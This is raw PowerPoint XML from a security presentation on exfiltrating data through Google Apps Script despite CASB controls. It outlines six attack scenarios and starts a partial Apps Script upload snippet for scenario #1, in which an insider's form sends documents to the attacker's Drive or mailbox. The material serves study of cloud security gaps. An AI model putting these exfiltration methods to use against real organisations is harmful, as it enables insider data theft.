        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="672932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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457103" y="1884713"/>
            <a:ext cx="8346600" cy="1165668"/>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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Attack scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321912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A27B9D09-8331-2C6E-3820-A6FA75A0ABFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900916" y="1231749"/>
            <a:ext cx="6858000" cy="2223376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Is it possible to exfiltrate data by using Google Apps Script?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Even if Cloud Access Security Broker (CASB) is used?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D01290-A07E-CFA9-5989-0782665A7283}"/>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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>customer's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>needs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E85702-1392-CE16-CD52-4F1F6CFAD129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>25/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1501297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Scenario #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A6CDA8B-ABF0-EFDB-B6CD-0A2B431FD598}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2121430" y="2794047"/>
            <a:ext cx="4901139" cy="1731473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80FF8B46-BB2C-0EDA-5932-A4FA88106F53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="8390079" cy="1174261"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Intentional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> exfiltration by internal user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Create simple form to upload document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>The uploaded documents are sent to the attacker's Google Drive and/or by email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6650F312-C07F-8642-68A1-4320667FF513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414462" y="2675288"/>
            <a:ext cx="6493669" cy="1850232"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0913D56A-C47F-A115-CB68-2164B746F3C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022569" y="3330160"/>
            <a:ext cx="527696" cy="525498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="ZoneTexte 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B688308C-EF59-4CB5-85DC-54942C562351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114781" y="3763257"/>
            <a:ext cx="385042" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Mail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47AE39F0-F0FF-D6B4-D359-29AADCB8B3D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>26/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804607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48FD14D8-8908-6C79-0428-A03657532529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129606"/>
            <a:ext cx="8055705" cy="3742197"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>What is Google Apps Script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>How to deploy a Google Apps Script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Authorization for Google Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Attack scenarios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>#1: Send documents by using forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>#2: Google Drive content from the victim to attacker’s account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>#3: Access Google Drive via permission change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>#4: Send Google Drive documents to the attacker’s mailbox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>#5: Exfiltrate documents from a workstation to Google Sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>#6: Implement persistent Google Workspace access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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Schedule</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834BA286-D94E-EA2D-7CA4-19A191D44B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="431528" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>3/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3123454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Scenario #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle : coins arrondis 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F069C08B-097D-BEC9-BE5D-BB22FD671DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="959412"/>
            <a:ext cx="3210401" cy="3923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1400" b="1" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(e) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>HtmlService.createHtmlOutputFromFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>('index.html');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>uploadFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>docupload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveUploader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>var folder, folders = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1"/>
              <a:t>DriveApp.getFoldersByName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1"/>
              <a:t>docupload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>folders.hasNext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>folder = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>folders.next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>folder = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>DriveApp.createFolder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0" err="1"/>
              <a:t>docupload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>var blob = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utilities.newBlob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Utilities.base64Decode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>obj.data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
